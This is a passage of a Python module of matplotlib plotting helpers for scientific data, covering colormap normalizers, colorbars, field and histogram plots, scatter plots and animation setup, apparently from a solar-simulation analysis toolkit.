def get_linear_normalizer(vmin, vmax, clip=False):
return mpl_colors.Normalize(vmin=vmin, vmax=vmax, clip=clip)
def get_log_normalizer(vmin, vmax, clip=False):
return mpl_colors.LogNorm(vmin=vmin, vmax=vmax, clip=clip)
def get_symlog_normalizer(vmin, vmax, linthresh, linscale=1.0, clip=False):
return mpl_colors.SymLogNorm(
linthresh, linscale=linscale, vmin=vmin, vmax=vmax, clip=clip, base=10
)
def get_normalizer(vmin, vmax, clip=False, log=False):
return (
get_log_normalizer(vmin, vmax, clip=clip)
if log
else get_linear_normalizer(vmin, vmax, clip=clip)
)
def get_cmap(name, bad_color="w"):
cmap = copy.copy(
CUSTOM_COLORMAPS[name] if name in CUSTOM_COLORMAPS else plt.get_cmap(name)
)
cmap.set_bad(bad_color)
return cmap
def get_scalar_mappable(norm, cmap):
return mpl_cm.ScalarMappable(norm=norm, cmap=cmap)
def set_color_cycle_from_cmap(ax, n_colors, cmap_name):
cmap = get_cmap(cmap_name)
norm = get_normalizer(0, n_colors - 1)
sm = get_scalar_mappable(norm, cmap)
ax.set_prop_cycle(color=[sm.to_rgba(i) for i in range(n_colors)])
def define_linear_segmented_colormap(name, colors, bad_color="white", N=256, gamma=1.0):
cmap = mpl_colors.LinearSegmentedColormap.from_list(name, colors, N=N, gamma=gamma)
cmap.set_bad(color=bad_color)
return cmap
def colors_from_values(values, norm, cmap, alpha=1.0, relative_alpha=True):
normalized_values = norm(values)
colors = cmap(normalized_values)
if relative_alpha:
colors[:, -1] = np.maximum(0.0, np.minimum(alpha, normalized_values * alpha))
else:
colors[:, -1] = alpha
return colors
def size_from_values(values, norm, max_size, min_size=1):
normalized_values = norm(values)
return np.maximum(min_size, np.minimum(max_size, max_size * normalized_values**2))
def create_colorbar_axis(ax, loc="right", size="5%", pad=0.05):
if hasattr(ax, "backstaff_axis_divider"):
divider = ax.backstaff_axis_divider
else:
divider = make_axes_locatable(ax) # Should not be repeated for same axis
ax.backstaff_axis_divider = divider
cax = divider.append_axes(loc, size=size, pad=pad)
return cax
def add_2d_colorbar(
fig,
ax,
mappeable,
loc="right",
pad=0.05,
minorticks_on=False,
opposite_side_ticks=False,
tick_formatter=None,
label="",
):
cax = create_colorbar_axis(ax, loc=loc, pad=pad)
cb = fig.colorbar(
mappeable,
cax=cax,
label=label,
orientation=("vertical" if loc in ["left", "right"] else "horizontal"),
ticklocation=loc,
)
if minorticks_on:
cb.ax.minorticks_on()
tick_ax = cb.ax.yaxis if loc in ["left", "right"] else cb.ax.xaxis
if opposite_side_ticks:
side = {"left": "right", "right": "left", "bottom": "top", "top": "bottom"}[loc]
tick_ax.set_label_position(side)
tick_ax.set_ticks_position(side)
if tick_formatter is not None:
tick_ax.set_major_formatter(tick_formatter)
return cb
def add_2d_colorbar_inside_from_cmap_and_norm(
fig,
ax,
norm,
cmap,
loc="upper left",
tick_loc="bottom",
width="30%",
height="3%",
orientation="horizontal",
label="",
fontsize="small",
minorticks_on=False,
tick_formatter=None,
):
cax = inset_axes(ax, width=width, height=height, loc=loc)
sm = get_scalar_mappable(norm, cmap)
sm.set_array([])
cb = fig.colorbar(
sm, cax=cax, orientation=orientation, ticklocation=tick_loc, label=label
)
cb.set_label(label=label, fontsize=fontsize)
if minorticks_on:
cb.ax.minorticks_on()
tick_ax = cb.ax.yaxis if tick_loc in ["left", "right"] else cb.ax.xaxis
cb.ax.tick_params(labelsize=fontsize)
if tick_formatter is not None:
tick_ax.set_major_formatter(tick_formatter)
return cb
def add_2d_colorbar_from_cmap_and_norm(
fig,
ax,
norm,
cmap,
loc="right",
width="5%",
pad=0.05,
minorticks_on=False,
opposite_side_ticks=False,
tick_formatter=None,
label="",
**kwargs,
):
cax = create_colorbar_axis(ax, loc=loc, size=width, pad=pad)
sm = get_scalar_mappable(norm, cmap)
sm.set_array([])
cb = fig.colorbar(
sm,
cax=cax,
label=label,
orientation=("vertical" if loc in ["left", "right"] else "horizontal"),
ticklocation=loc,
**kwargs,
)
if minorticks_on:
cb.ax.minorticks_on()
tick_ax = cb.ax.yaxis if loc in ["left", "right"] else cb.ax.xaxis
if opposite_side_ticks:
side = {"left": "right", "right": "left", "bottom": "top", "top": "bottom"}[loc]
tick_ax.set_label_position(side)
tick_ax.set_ticks_position(side)
if tick_formatter is not None:
tick_ax.set_major_formatter(tick_formatter)
return cb
def add_3d_colorbar(fig, norm, cmap, label=""):
sm = get_scalar_mappable(norm, cmap)
sm.set_array([])
return fig.colorbar(sm, label=label)
def add_3d_line_collection(ax, x, y, z, colors, lw=1.0):
points = np.array([x, y, z]).T.reshape(-1, 1, 3)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = Line3DCollection(segments, colors=colors)
lc.set_linewidth(lw)
return ax.add_collection(lc)
def add_textbox(ax, text, loc, pad=0.4):
textbox = AnchoredText(text, loc, pad=pad)
ax.add_artist(textbox)
def render(
fig=None,
tight_layout=True,
bbox_extra_artists=None,
bbox_inches="tight",
output_path=None,
force_show=False,
close=True,
):
if fig is not None and tight_layout:
fig.tight_layout()
if output_path is not None:
fig.savefig(
output_path, bbox_extra_artists=bbox_extra_artists, bbox_inches=bbox_inches
)
if force_show:
plt.show()
elif close:
plt.close(fig)
else:
plt.show()
def plot_1d_field(
coords,
values,
fig=None,
ax=None,
color="k",
alpha=1.0,
lw=1.0,
ls="-",
marker=None,
markersize=None,
minorticks_on=True,
x_lims=None,
y_lims=None,
log_x=False,
log_y=False,
extra_artists=None,
extra_patches=None,
xlabel=None,
ylabel=None,
label=None,
legend_loc=None,
legend_fontsize=None,
title=None,
zorder=2,
output_path=None,
render_now=True,
fig_kwargs={},
):
if fig is None or ax is None:
fig, ax = create_2d_subplots(**fig_kwargs)
(lines,) = ax.plot(
coords,
values,
color=color,
alpha=alpha,
lw=lw,
ls=ls,
marker=marker,
markersize=markersize,
markeredgewidth=0,
label=label,
zorder=zorder,
)
if extra_artists is not None:
for artist in extra_artists:
ax.add_artist(artist)
if extra_patches is not None:
for patch in extra_patches:
ax.add_patch(patch)
if log_x:
ax.set_xscale("log")
if log_y:
ax.set_yscale("log")
set_2d_plot_extent(ax, x_lims, y_lims)
set_2d_axis_labels(ax, xlabel, ylabel)
if minorticks_on:
ax.minorticks_on()
if title is not None:
ax.set_title(title)
if legend_loc is not None:
ax.legend(loc=legend_loc, fontsize=legend_fontsize)
if render_now:
render(fig, output_path=output_path)
return fig, ax, lines
def plot_2d_field(
hor_coords,
vert_coords,
values,
alphas=None,
fig=None,
ax=None,
minorticks_on=True,
aspect_equal=True,
log_x=False,
log_y=False,
vmin=None,
vmax=None,
log=False,
symlog=False,
linthresh=np.inf,
linscale=1.0,
x_lims=None,
y_lims=None,
cmap_name="viridis",
cmap_bad_color="white",
cbar_loc="right",
cbar_pad=0.05,
cbar_minorticks_on=False,
cbar_opposite_side_ticks=False,
contour_levels=None,
contour_colors="r",
contour_alpha=1.0,
log_contour=False,
vmin_contour=None,
vmax_contour=None,
contour_cmap_name="viridis",
extra_artists=None,
xlabel=None,
ylabel=None,
clabel="",
title=None,
rasterized=None,
output_path=None,
picker=None,
render_now=True,
fig_kwargs=dict(width=None, aspect_ratio=None),
):
if fig is None or ax is None:
width = fig_kwargs.pop("width", None)
aspect_ratio = fig_kwargs.pop("aspect_ratio", None)
dpi = fig_kwargs.pop("dpi", 300)
if width is None:
width = 3.0 * hor_coords.size / dpi
if aspect_ratio is None:
aspect_ratio = (
((hor_coords[-1] - hor_coords[0]) / (vert_coords[-1] - vert_coords[0]))
if aspect_equal
else (4 / 3)
)
fig, ax = create_2d_subplots(aspect_ratio=aspect_ratio, **fig_kwargs)
if symlog:
norm = get_symlog_normalizer(vmin, vmax, linthresh, linscale=linscale)
else:
norm = get_normalizer(vmin, vmax, log=log)
if log_x:
hor_coords = np.log10(hor_coords)
if log_y:
vert_coords = np.log10(vert_coords)
lower_edges_hor = np.empty(hor_coords.size + 1, dtype=hor_coords.dtype)
lower_edges_vert = np.empty(vert_coords.size + 1, dtype=vert_coords.dtype)
lower_edges_hor[:-1] = hor_coords
lower_edges_vert[:-1] = vert_coords
lower_edges_hor[-1] = hor_coords[-1] + (hor_coords[-1] - hor_coords[-2])
lower_edges_vert[-1] = vert_coords[-1] + (vert_coords[-1] - vert_coords[-2])
mesh = ax.pcolormesh(
*np.meshgrid(lower_edges_hor, lower_edges_vert),
values.T,
shading="auto",
norm=norm,
cmap=get_cmap(cmap_name, bad_color=cmap_bad_color),
rasterized=rasterized,
picker=picker,
)
if contour_levels is not None:
ax.contourf(
hor_coords,
vert_coords,
values.T,
levels=contour_levels,
norm=get_normalizer(vmin_contour, vmax_contour, log=log_contour),
cmap=get_cmap(contour_cmap_name),
colors=contour_colors,
alpha=contour_alpha,
rasterized=rasterized,
)
if extra_artists is not None:
for artist in extra_artists:
ax.add_artist(artist)
if x_lims is None:
x_lims = hor_coords[0], hor_coords[-1]
if y_lims is None:
y_lims = vert_coords[0], vert_coords[-1]
set_2d_plot_extent(ax, x_lims, y_lims)
set_2d_axis_labels(ax, xlabel, ylabel)
if cbar_loc is not None:
add_2d_colorbar(
fig,
ax,
mesh,
loc=cbar_loc,
pad=cbar_pad,
minorticks_on=cbar_minorticks_on,
opposite_side_ticks=cbar_opposite_side_ticks,
label=clabel,
)
if minorticks_on:
ax.minorticks_on()
if aspect_equal:
ax.set_aspect("equal")
if title is not None:
ax.set_title(title)
if alphas is not None:
fig.canvas.draw()
mesh.get_facecolors()[:, 3] = alphas.T.ravel()
if render_now:
render(fig, output_path=output_path)
return fig, ax, mesh
def plot_histogram(
values,
weights=None,
fig=None,
ax=None,
bin_weighted=False,
divided_by_bin_size=False,
min_n_values=None,
hist_scale=1.0,
bins="auto",
weighted_average=False,
log_x=False,
log_y=False,
show_log_x=False,
linthresh_x=None,
linthresh_y=None,
vmin=None,
vmax=None,
plot_type="steps",
horizontal=False,
fit_limits=None,
extra_artists=None,
color="k",
lw=1.0,
ls="-",
alpha=1.0,
fill_alpha=1.0,
x_lims=None,
y_lims=None,
label=None,
legend_loc=None,
legend_fontsize=None,
xlabel=None,
ylabel=None,
xlabel_color="k",
ylabel_color="k",
minorticks_on=True,
output_path=None,
fig_kwargs={},
render_now=True,
):
if fig is None or ax is None:
fig, ax = create_2d_subplots(**fig_kwargs)
hist, bin_edges, bin_centers = compute_histogram(
values,
weights=weights,
bins=bins,
weighted_average=weighted_average,
min_n_values=min_n_values,
vmin=vmin,
vmax=vmax,
decide_bins_in_log_space=(log_y if horizontal else log_x),
linthresh=(linthresh_y if horizontal else linthresh_x),
)
hist = np.asfarray(hist)
bin_sizes = bin_edges[1:] - bin_edges[:-1]
if divided_by_bin_size:
hist /= bin_sizes
if bin_weighted:
hist *= bin_centers * bin_sizes
if hist_scale != 1.0:
hist *= hist_scale
if plot_type == "steps":
if horizontal:
(line,) = ax.step(hist, bin_edges[:-1], c=color, ls=ls, lw=lw, label=label)
else:
(line,) = ax.step(bin_edges[:-1], hist, c=color, ls=ls, lw=lw, label=label)
elif plot_type == "bar":
if horizontal:
line = ax.barh(
bin_edges[:-1],
hist,
align="edge",
height=bin_sizes,
log=log_x,
color=color,
alpha=alpha,
linewidth=lw,
label=label,
)
else:
line = ax.bar(
bin_edges[:-1],
hist,
align="edge",
width=bin_sizes,
log=log_y,
color=color,
alpha=alpha,
linewidth=lw,
label=label,
)
elif plot_type == "fillstep":
line = []
if horizontal:
line.append(
ax.fill_betweenx(
bin_edges[:-1], hist, step="pre", color=color, alpha=fill_alpha
)
)
else:
line.append(
ax.fill_between(
bin_edges[:-1], hist, step="pre", color=color, alpha=fill_alpha
)
)
if horizontal:
line.append(
ax.step(hist, bin_edges[:-1], c=color, ls=ls, lw=lw, label=label)
)
else:
line.append(
ax.step(bin_edges[:-1], hist, c=color, ls=ls, lw=lw, label=label)
)
elif plot_type == "fill":
line = []
if horizontal:
line.append(
ax.fill_betweenx(bin_centers, hist, color=color, alpha=fill_alpha)
)
else:
line.append(
ax.fill_between(bin_centers, hist, color=color, alpha=fill_alpha)
)
if horizontal:
line.append(
ax.plot(
hist, bin_centers, c=color, ls=ls, lw=lw, alpha=alpha, label=label
)
)
else:
line.append(
ax.plot(
bin_centers, hist, c=color, ls=ls, lw=lw, alpha=alpha, label=label
)
)
elif plot_type == "points":
if horizontal:
(line,) = ax.plot(
hist, bin_centers, c=color, ls=ls, lw=lw, alpha=alpha, marker="o"
)
else:
(line,) = ax.plot(
bin_centers, hist, c=color, ls=ls, lw=lw, alpha=alpha, marker="o"
)
else:
raise ValueError(f"Invalid plot type {plot_type}")
if extra_artists is not None:
for artist in extra_artists:
ax.add_artist(artist)
if log_x or show_log_x:
if linthresh_x is None:
ax.set_xscale("log")
else:
ax.set_xscale("symlog", linthresh=linthresh_x)
if log_y:
if linthresh_y is None:
ax.set_yscale("log")
else:
ax.set_yscale("symlog", linthresh=linthresh_y)
if fit_limits is not None:
start_idx = np.argmin(np.abs(bin_centers - fit_limits[0]))
end_idx = np.argmin(np.abs(bin_centers - fit_limits[1]))
coefs = np.polyfit(
np.log10(bin_centers[start_idx:end_idx])
if log_x
else bin_centers[start_idx:end_idx],
np.log10(hist[start_idx:end_idx]) if log_y else hist[start_idx:end_idx],
1,
)
print(f"Slope of fitted line: {coefs[0]}")
fit_values = np.poly1d(coefs)(np.log10(bin_centers) if log_x else bin_centers)
if log_y:
fit_values = 10**fit_values
ax.plot(bin_centers, fit_values, "k--", alpha=0.3, lw=1.0)
shift = 3
xylabel = (
(bin_centers[shift] + bin_centers[shift + 1]) / 2,
(fit_values[shift] + fit_values[shift + 1]) / 2,
)
p1 = ax.transData.transform_point((bin_centers[shift], fit_values[shift]))
p2 = ax.transData.transform_point(
(bin_centers[shift + 1], fit_values[shift + 1])
)
dy = p2[1] - p1[1]
dx = p2[0] - p1[0]
rotn = np.degrees(np.arctan2(dy, dx))
ax.annotate(
f"{coefs[0]:.1f}",
xy=xylabel,
ha="center",
va="center",
rotation=rotn,
backgroundcolor="w",
alpha=0.5,
fontsize="x-small",
)
if minorticks_on:
ax.minorticks_on()
set_2d_plot_extent(ax, x_lims, y_lims)
set_2d_axis_labels(ax, xlabel, ylabel, xcolor=xlabel_color, ycolor=ylabel_color)
ax.tick_params(axis="x", labelcolor=xlabel_color)
ax.tick_params(axis="y", labelcolor=ylabel_color)
if legend_loc:
ax.legend(loc=legend_loc, fontsize=legend_fontsize)
if render_now:
render(fig, output_path=output_path)
return fig, ax, line
def plot_scatter(
values_x,
values_y,
values_c=None,
fig=None,
ax=None,
log_x=False,
log_y=False,
linthresh_x=None,
linthresh_y=None,
linthresh_c=None,
log_c=False,
vmin_c=None,
vmax_c=None,
cmap_name="viridis",
marker="o",
s=5.0,
relative_s=False,
color="k",
edgecolors="none",
alpha=1.0,
relative_alpha=False,
x_lims=None,
y_lims=None,
xlabel=None,
ylabel=None,
aspect="auto",
minorticks_on=True,
internal_cbar=False,
cbar_loc="right",
cbar_pad=0.05,
cbar_minorticks_on=False,
cbar_opposite_side_ticks=False,
cbar_tick_loc="right",
cbar_width="5%",
cbar_height="60%",
cbar_orientation="vertical",
clabel="",
label=None,
legend_loc=None,
extra_artists=None,
show_break_lines=False,
output_path=None,
fig_kwargs={},
render_now=True,
):
broken_x = (
isinstance(x_lims, (tuple, list))
and isinstance(x_lims[0], (tuple, list))
and isinstance(x_lims[1], (tuple, list))
)
if fig is None or ax is None:
if broken_x:
fig, axes = create_2d_subplots(ncols=2, sharey=True, **fig_kwargs)
extra_ax, ax = axes
fig.subplots_adjust(wspace=0)
cbar_width = f'{2*float(cbar_width.replace("%", ""))}%'
else:
fig, ax = create_2d_subplots(**fig_kwargs)
axes = [ax]
else:
if isinstance(ax, (list, tuple, np.ndarray)):
axes = ax
extra_ax, ax = axes
broken_x = True
else:
axes = [ax]
if log_x:
if linthresh_x is None:
for ax in axes:
ax.set_xscale("log")
else:
for ax in axes:
ax.set_xscale("symlog", linthresh=linthresh_x)
if log_y:
if linthresh_y is None:
for ax in axes:
ax.set_yscale("log")
else:
for ax in axes:
ax.set_yscale("symlog", linthresh=linthresh_y)
if values_c is None:
c = color
else:
if vmin_c is None:
vmin_c = np.nanmin(values_c)
if vmax_c is None:
vmax_c = np.nanmax(values_c)
if linthresh_c is None:
norm = get_normalizer(vmin_c, vmax_c, log=log_c)
else:
norm = get_symlog_normalizer(vmin_c, vmax_c, linthresh_c)
cmap = get_cmap(cmap_name)
c = colors_from_values(
values_c, norm, cmap, alpha=alpha, relative_alpha=relative_alpha
)
if relative_s:
s = size_from_values(values_c, norm, s)
if cbar_loc is not None:
if internal_cbar:
add_2d_colorbar_inside_from_cmap_and_norm(
fig,
ax,
norm,
cmap,
loc=cbar_loc,
tick_loc=cbar_tick_loc,
width=cbar_width,
height=cbar_height,
orientation=cbar_orientation,
label=clabel,
)
else:
add_2d_colorbar_from_cmap_and_norm(
fig,
ax,
norm,
cmap,
loc=cbar_loc,
width=cbar_width,
pad=cbar_pad,
minorticks_on=cbar_minorticks_on,
opposite_side_ticks=cbar_opposite_side_ticks,
label=clabel,
)
if broken_x:
cb = add_2d_colorbar_from_cmap_and_norm(
fig,
extra_ax,
norm,
cmap,
loc=cbar_loc,
width=cbar_width,
pad=cbar_pad,
minorticks_on=cbar_minorticks_on,
opposite_side_ticks=cbar_opposite_side_ticks,
label=clabel,
filled=False,
)
cb.ax.axis("off")
ax.scatter(
values_x,
values_y,
c=c,
s=s,
marker=marker,
edgecolors=edgecolors,
alpha=alpha,
label=label,
)
if broken_x:
extra_ax.scatter(
values_x,
values_y,
c=c,
s=s,
marker=marker,
edgecolors=edgecolors,
alpha=alpha,
label=label,
)
extra_ax.spines.right.set_visible(False)
ax.spines.left.set_visible(False)
ax.tick_params(which="both", left=False, labelleft=False)
extra_ax.tick_params(which="both", right=False, labelright=False)
if show_break_lines:
d = 0.5 # Proportion of vertical to horizontal extent of the slanted line
kwargs = dict(
marker=[(-d, -1), (d, 1)],
markersize=8,
linestyle="none",
color="k",
mec="k",
mew=1,
clip_on=False,
)
extra_ax.plot([1, 1], [0, 1], transform=extra_ax.transAxes, **kwargs)
ax.plot([0, 0], [0, 1], transform=ax.transAxes, **kwargs)
if extra_artists is not None:
for artist in extra_artists:
ax.add_artist(artist)
if minorticks_on:
for ax in axes:
ax.minorticks_on()
for ax in axes:
ax.set_aspect(aspect)
if x_lims is not None:
if broken_x:
extra_ax.set_xlim(*x_lims[0])
ax.set_xlim(*x_lims[1])
else:
ax.set_xlim(*x_lims)
if y_lims is not None:
ax.set_ylim(*y_lims)
if broken_x:
fig.supxlabel(xlabel, y=0.04, fontsize="medium")
extra_ax.set_ylabel(ylabel)
else:
set_2d_axis_labels(ax, xlabel, ylabel)
if legend_loc is not None:
ax.legend(loc=legend_loc)
if render_now:
render(fig, output_path=output_path, tight_layout=False)
return fig, (axes[0] if len(axes) == 1 else axes)
def plot_scatter_with_histograms(
values_x,
values_y,
values_c=None,
hist_x_scale=1.0,
hist_y_scale=1.0,
bins_x="auto",
bins_y="auto",
hist_x_divided_by_bin_size=False,
hist_y_divided_by_bin_size=False,
log_x=False,
log_y=False,
log_c=False,
log_hist_x=False,
log_hist_y=False,
vmin_x=None,
vmax_x=None,
vmin_y=None,
vmax_y=None,
vmin_c=None,
vmax_c=None,
cmap_name="viridis",
marker="o",
s=5.0,
relative_s=False,
color="k",
edgecolors="none",
alpha=1.0,
relative_alpha=False,
hist_x_alpha=1.0,
hist_y_alpha=1.0,
hist_x_color="k",
hist_y_color="k",
hist_linewidth=0,
xlabel=None,
ylabel=None,
hist_x_plot_type="bar",
hist_y_plot_type="bar",
hist_x_label=None,
hist_y_label=None,
hist_x_label_color="k",
hist_y_label_color="k",
hist_x_fit_limits=None,
hist_y_fit_limits=None,
spacing=0.015,
hist_size_x=0.3,
hist_size_y=0.3,
left_padding=0.12,
bottom_padding=0.1,
minorticks_on=True,
internal_cbar=False,
cbar_loc="upper left",
cbar_tick_loc="right",
cbar_width="3%",
cbar_height="60%",
cbar_orientation="vertical",
clabel="",
output_path=None,
fig_kwargs={},
render_now=True,
):
left = left_padding # > 0 to make space for labels
bottom = bottom_padding # > 0 to make space for labels
width = 1 - 1.5 * left - spacing - hist_size_y
height = 1 - 1.5 * bottom - spacing - hist_size_x
fig = create_figure(**fig_kwargs)
ax = fig.add_axes([left, bottom, width, height])
ax_hist_x = fig.add_axes(
[left, bottom + height + spacing, width, hist_size_x], sharex=ax
)
ax_hist_y = fig.add_axes(
[left + width + spacing, bottom, hist_size_y, height], sharey=ax
)
ax_hist_x.tick_params(axis="x", labelbottom=False)
ax_hist_y.tick_params(axis="y", labelleft=False)
ax_hist_x.tick_params(axis="y", labelcolor=hist_x_label_color)
ax_hist_y.tick_params(axis="x", labelcolor=hist_y_label_color)
if log_x:
ax.set_xscale("log")
if log_y:
ax.set_yscale("log")
if values_c is None:
c = color
else:
if vmin_c is None:
vmin_c = np.nanmin(values_c)
if vmax_c is None:
vmax_c = np.nanmax(values_c)
norm = get_normalizer(vmin_c, vmax_c, log=log_c)
cmap = get_cmap(cmap_name)
c = colors_from_values(
values_c, norm, cmap, alpha=alpha, relative_alpha=relative_alpha
)
if relative_s:
s = size_from_values(values_c, norm, s)
if internal_cbar:
add_2d_colorbar_inside_from_cmap_and_norm(
fig,
ax,
norm,
cmap,
loc=cbar_loc,
tick_loc=cbar_tick_loc,
width=cbar_width,
height=cbar_height,
orientation=cbar_orientation,
label=clabel,
)
ax.scatter(
values_x, values_y, c=c, s=s, marker=marker, edgecolors=edgecolors, alpha=alpha
)
if minorticks_on:
ax.minorticks_on()
plot_histogram(
values_x,
fig=fig,
ax=ax_hist_x,
hist_scale=hist_x_scale,
bin_weighted=False,
divided_by_bin_size=hist_x_divided_by_bin_size,
bins=bins_x,
log_x=log_x,
log_y=log_hist_x,
vmin=vmin_x,
vmax=vmax_x,
plot_type=hist_x_plot_type,
horizontal=False,
color=hist_x_color,
lw=hist_linewidth,
ls="-",
alpha=hist_x_alpha,
fit_limits=hist_x_fit_limits,
minorticks_on=minorticks_on,
ylabel=hist_x_label,
ylabel_color=hist_x_label_color,
render_now=False,
)
plot_histogram(
values_y,
fig=fig,
ax=ax_hist_y,
hist_scale=hist_y_scale,
bin_weighted=False,
divided_by_bin_size=hist_y_divided_by_bin_size,
bins=bins_y,
log_x=log_hist_y,
log_y=log_y,
vmin=vmin_y,
vmax=vmax_y,
plot_type=hist_y_plot_type,
horizontal=True,
color=hist_y_color,
lw=hist_linewidth,
ls="-",
alpha=hist_y_alpha,
fit_limits=hist_y_fit_limits,
minorticks_on=minorticks_on,
xlabel=hist_y_label,
xlabel_color=hist_y_label_color,
render_now=False,
)
set_2d_axis_labels(ax, xlabel, ylabel)
if render_now:
render(fig, output_path=output_path)
return fig, ax, ax_hist_x, ax_hist_y
def compute_coord_lims(coords, log=False, pad=0.05):
coords = coords[coords > 0] if log else coords
lower = np.nanmin(coords)
upper = np.nanmax(coords)
if log:
extent = np.log10(upper) - np.log10(lower)
lower = max(0, 10 ** (np.log10(lower) - pad * extent))
upper = 10 ** (np.log10(upper) + pad * extent)
else:
extent = upper - lower
lower -= pad * extent
upper += pad * extent
return lower, upper
def setup_line_animation(
get_updated_coordinates,
fig=None,
ax=None,
log_x=False,
log_y=False,
x_lims=None,
y_lims=None,
invert_xaxis=False,
invert_yaxis=False,
ds="default",
ls="-",
lw=1.0,
color="k",
marker=None,
alpha=1.0,
minorticks_on=True,
xlabel=None,
ylabel=None,
label=None,
legend_loc=None,
legend_fontsize=None,
extra_artists=None,
extra_patches=None,
show_frame_label=False,
frame_label_fontsize="small",
frame_label_color="k",
fig_kwargs={},
):
if fig is None or ax is None:
fig, ax = create_2d_subplots(**fig_kwargs)
(line,) = ax.plot(
[],
[],
ds=ds,
ls=ls,
lw=lw,
marker=marker,
color=color,
alpha=alpha,
label=label,
)
text = (
ax.text(
0.01,
0.99,
"",
transform=ax.transAxes,
ha="left",
va="top",
fontsize=frame_label_fontsize,
color=frame_label_color,
)
if show_frame_label
else None
)
if extra_artists is not None:
for artist in extra_artists:
ax.add_artist(artist)
if extra_patches is not None:
for patch in extra_patches:
ax.add_patch(patch)
if log_x:
ax.set_xscale("log")
if log_y:
ax.set_yscale("log")
set_2d_plot_extent(ax, x_lims, y_lims)
set_2d_axis_labels(ax, xlabel, ylabel)
if minorticks_on:
ax.minorticks_on()
if invert_xaxis:
ax.invert_xaxis()
if invert_yaxis:
ax.invert_yaxis()
if legend_loc is not None:
ax.legend(loc=legend_loc, fontsize=legend_fontsize)
init = lambda: (line, *(() if text is None else (text,)))
def update(frame):
result = get_updated_coordinates(frame)
assert isinstance(result, tuple)
result = list(result)
coordinates = result.pop(0)
line.set_data(*coordinates)
ret = (line,)
if show_frame_label:
frame_label = result.pop(0)
text.set_text(frame_label)
ret += (text,)
if x_lims is None:
ax.set_xlim(*compute_coord_lims(coordinates[0], log=log_x))
if y_lims is None:
ax.set_ylim(*compute_coord_lims(coordinates[1], log=log_y))
return ret
return fig, ax, init, update
def setup_scatter_animation(
get_updated_coordinates,
fig=None,
ax=None,
log_x=False,
log_y=False,
x_lims=None,
y_lims=None,
invert_xaxis=False,
invert_yaxis=False,
marker="o",
s=1.0,
c="k",
edgecolors="none",
alpha=1.0,
minorticks_on=True,
xlabel=None,
ylabel=None,
label=None,
legend_loc=None,
show_frame_label=False,
frame_label_fontsize="small",
frame_label_color="k",
fig_kwargs={},
):
if fig is None or ax is None:
fig, ax = create_2d_subplots(**fig_kwargs)
sc = ax.scatter(
[], [], marker=marker, s=s, c=c, edgecolors=edgecolors, alpha=alpha, label=label
)
text = (
ax.text(
0.01,
0.99,
"",
transform=ax.transAxes,
ha="left",
va="top",
fontsize=frame_label_fontsize,
color=frame_label_color,
)
if show_frame_label
else None
)
if log_x:
ax.set_xscale("log")
if log_y:
ax.set_yscale("log")
set_2d_plot_extent(ax, x_lims, y_lims)
set_2d_axis_labels(ax, xlabel, ylabel)
if minorticks_on:
ax.minorticks_on()
if invert_xaxis:
ax.invert_xaxis()
if invert_yaxis:
ax.invert_yaxis()
if legend_loc is not None:
ax.legend(loc=legend_loc)
init = lambda: (sc, *(() if text is None else (text,)))
def update(frame):
result = get_updated_coordinates(frame)
assert isinstance(result, tuple)
result = list(result)
coordinates = result.pop(0)
sc.set_offsets(coordinates)
ret = (sc,)
if show_frame_label:
frame_label = result.pop(0)
text.set_text(frame_label)
ret += (text,)
if x_lims is None:
ax.set_xlim(*compute_coord_lims(coordinates[0], log=log_x))
if y_lims is None:
ax.set_ylim(*compute_coord_lims(coordinates[1], log=log_y))
return ret
return fig, ax, init, update
def setup_2d_field_animation(
hor_coords,
vert_coords,
get_updated_values,
fig=None,
ax=None,
minorticks_on=True,
vmin=None,
vmax=None,
symmetric_clims=False,
log=False,
symlog=False,
linthresh=np.inf,
linscale=1.0,
alpha=1.0,
cmap_name="viridis",
cmap_bad_color="white",
cbar_loc="right",
cbar_pad=0.05,
cbar_minorticks_on=False,
cbar_opposite_side_ticks=False,
xlabel=None,
ylabel=None,
clabel="",
show_frame_label=False,
frame_label_fontsize="small",
frame_label_color="k",
frame_label_outline_color="white",
use_varying_alpha=False,
title=None,
rasterized=None,
extra_artists=[],
fig_kwargs=dict(width=7.2, aspect_ratio=5.0 / 4.0),
picker=None,
):
if fig is None or ax is None:
fig, ax = create_2d_subplots(**fig_kwargs)
if symlog:
norm = get_symlog_normalizer(vmin, vmax, linthresh, linscale=linscale)
else:
norm = get_normalizer(vmin, vmax, log=log)
cmap = get_cmap(cmap_name, bad_color=cmap_bad_color)
lower_edges_hor = np.empty(hor_coords.size + 1, dtype=hor_coords.dtype)
lower_edges_vert = np.empty(vert_coords.size + 1, dtype=vert_coords.dtype)
lower_edges_hor[:-1] = hor_coords
lower_edges_vert[:-1] = vert_coords
lower_edges_hor[-1] = hor_coords[-1] + (hor_coords[-1] - hor_coords[-2])
lower_edges_vert[-1] = vert_coords[-1] + (vert_coords[-1] - vert_coords[-2])
mesh = ax.pcolormesh(
*np.meshgrid(lower_edges_hor, lower_edges_vert),
np.ones((len(vert_coords), len(hor_coords))),
shading="auto",
norm=norm,
cmap=cmap,
alpha=alpha,
rasterized=rasterized,
picker=picker,
)
if show_frame_label:
text = ax.text(
0.01,
0.99,
"",
transform=ax.transAxes,
ha="left",
va="top",
fontsize=frame_label_fontsize,
color=frame_label_color,
)
if frame_label_outline_color is not None:
text.set_path_effects(
[
path_effects.Stroke(
linewidth=0.5, foreground=frame_label_outline_color
),
path_effects.Normal(),
]
)
else:
text = None
set_2d_plot_extent(
ax, (hor_coords[0], hor_coords[-1]), (vert_coords[0], vert_coords[-1])
)
set_2d_axis_labels(ax, xlabel, ylabel)
if cbar_loc is not None:
add_2d_colorbar(
fig,
ax,
mesh,
loc=cbar_loc,
pad=cbar_pad,
minorticks_on=cbar_minorticks_on,
opposite_side_ticks=cbar_opposite_side_ticks,
label=clabel,
)
if extra_artists is not None:
for artist in extra_artists:
ax.add_artist(artist)
if minorticks_on:
ax.minorticks_on()
ax.set_aspect("equal")
if title is not None:
ax.set_title(title)
init = lambda: (mesh, *(() if text is None else (text,)))
def update(frame):
result = get_updated_values(frame)
assert isinstance(result, tuple)
result = list(result)
values = result.pop(0)
mesh.update({"array": values.T.ravel()})
ret = (mesh,)
if use_varying_alpha:
alphas = result.pop(0)
fig.canvas.draw()
mesh.get_facecolors()[:, 3] = alphas.T.ravel()
if show_frame_label:
frame_label = result.pop(0)
text.set_text(frame_label)
ret += (text,)
if vmin is None and vmax is None:
v = values[values > 0] if log else values
new_vmin = np.nanmin(v)
new_vmax = np.nanmax(v)
if symmetric_clims:
new_vmax = max(abs(new_vmin), abs(new_vmax))
